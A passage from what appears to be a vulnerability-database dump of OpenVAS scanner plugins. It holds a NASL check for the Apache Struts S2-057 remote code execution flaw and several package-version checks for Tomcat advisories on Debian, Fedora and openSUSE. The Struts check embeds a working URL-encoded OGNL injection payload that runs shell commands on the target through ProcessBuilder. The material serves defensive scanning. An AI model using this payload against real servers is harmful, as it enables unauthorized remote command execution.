script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a specially crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. 
Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n 
\"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T19:25:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-14T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for tomcat8 (DLA-1883-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2016-5388", "CVE-2019-0221"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891883", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891883", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891883\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-5388\", \"CVE-2018-8014\", \"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-08-14 02:00:17 +0000 (Wed, 14 Aug 2019)\");\n script_name(\"Debian LTS: Security Advisory for tomcat8 (DLA-1883-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1883-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/929895\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/898935\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the DLA-1883-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 
3875\nsection 4.1.18 and therefore does not protect applications from\nthe presence of untrusted client data in the HTTP_PROXY\nenvironment variable, which might allow remote attackers to\nredirect an application's outbound HTTP traffic to an arbitrary\nproxy server via a crafted Proxy header in an HTTP request, aka an\n'httpoxy' issue. The 'cgi' servlet now has a 'envHttpHeaders'\nparameter to filter environment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache\nTomcat are insecure and enable 'supportsCredentials' for all\norigins. It is expected that users of the CORS filter will have\nconfigured it appropriately for their environment rather than\nusing it in the default configuration. Therefore, it is expected\nthat most users will not be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided\ndata without escaping and is, therefore, vulnerable to XSS. SSI is\ndisabled by default. The printenv command is intended for\ndebugging and is unlikely to be present in a production website.\");\n\n script_tag(name:\"affected\", value:\"'tomcat8' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u15\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2018-b1832101b8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875012", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875012", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b1832101b8_tomcat_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for tomcat FEDORA-2018-b1832101b8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875012\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-30 07:27:35 +0200 (Thu, 30 Aug 2018)\");\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2018-b1832101b8\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b1832101b8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C4TFRHHMLL6LSYA5X6QP6CKDFELA5XRK\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.5.32~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:53", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-09-18T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:2740-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-1336", "CVE-2018-8037"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851897", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851897", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851897\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-09-18 08:13:15 +0200 (Tue, 18 Sep 2018)\");\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:2740-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for tomcat to 8.0.53 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-1336: An improper handling of overflow in the UTF-8 decoder with\n supplementary characters could have led to an infinite loop in the\n decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8034: The host name verification when using TLS with the\n WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at\n the same time as the container triggered the async timeout, a race\n condition existed that could have resulted in a user seeing a response\n intended for a different user. 
An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the closure of the\n connection when an async request was completed by the application and\n timed out by the container at the same time. This could also have\n resulted in a user seeing a response intended for another user\n (bsc#1102410).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n Bug fixes:\n\n - bsc#1067720: Avoid overwriting of customer's configuration during update.\n\n - bsc#1095472: Add Obsoletes for tomcat6 packages.\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1019=1\");\n\n script_tag(name:\"affected\", value:\"tomcat on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2740-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-09/msg00036.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-docs-webapp\", rpm:\"tomcat-docs-webapp~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-3_0-api\", rpm:\"tomcat-el-3_0-api~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-embed\", rpm:\"tomcat-embed~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-javadoc\", rpm:\"tomcat-javadoc~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2_3-api\", rpm:\"tomcat-jsp-2_3-api~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsvc\", rpm:\"tomcat-jsvc~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3_1-api\", rpm:\"tomcat-servlet-3_1-api~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~8.0.53~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:38:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:3054-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-1336", 
"CVE-2018-8037"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852045", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852045\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:37:34 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for tomcat (openSUSE-SU-2018:3054-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", 
re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3054-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00016.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the openSUSE-SU-2018:3054-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for tomcat to version 9.0.10 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with\n supplementary characters could have lead to an infinite loop in the\n decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS with the\n WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at\n the same time as the container triggered the async timeout, a race\n condition existed that could have resulted in a user seeing a response\n intended for a different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the closure of the\n connection when an async request was completed by the application and\n timed out by the container at the same time. 
This could also have\n resulted in a user seeing a response intended for another user\n (bsc#1102410).\n\n Bug fixes:\n\n - Avoid overwriting of customer's configuration during update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n This update was imported from the SUSE:SLE-15:Update update project.\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1129=1\");\n\n script_tag(name:\"affected\", value:\"tomcat on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-docs-webapp\", rpm:\"tomcat-docs-webapp~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-3_0-api\", rpm:\"tomcat-el-3_0-api~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-embed\", rpm:\"tomcat-embed~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-javadoc\", rpm:\"tomcat-javadoc~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2_3-api\", rpm:\"tomcat-jsp-2_3-api~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsvc\", rpm:\"tomcat-jsvc~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-4_0-api\", rpm:\"tomcat-servlet-4_0-api~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~9.0.10~lp150.2.3.2\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2018-b18f9dd65b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-1336", "CVE-2018-11784", "CVE-2018-8037"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875539", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the 
hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875539\");\n script_version(\"2019-04-03T06:52:13+0000\");\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8037\", \"CVE-2018-8034\", \"CVE-2018-8014\", \"CVE-2018-1336\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:52:13 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:52:13 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for tomcat FEDORA-2018-b18f9dd65b\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b18f9dd65b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BZ4PX4B3QTKRM35VJAVIEOPZAF76RPBP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the FEDORA-2018-b18f9dd65b advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Tomcat is the servlet container that is used in the official Reference\nImplementation for the Java 
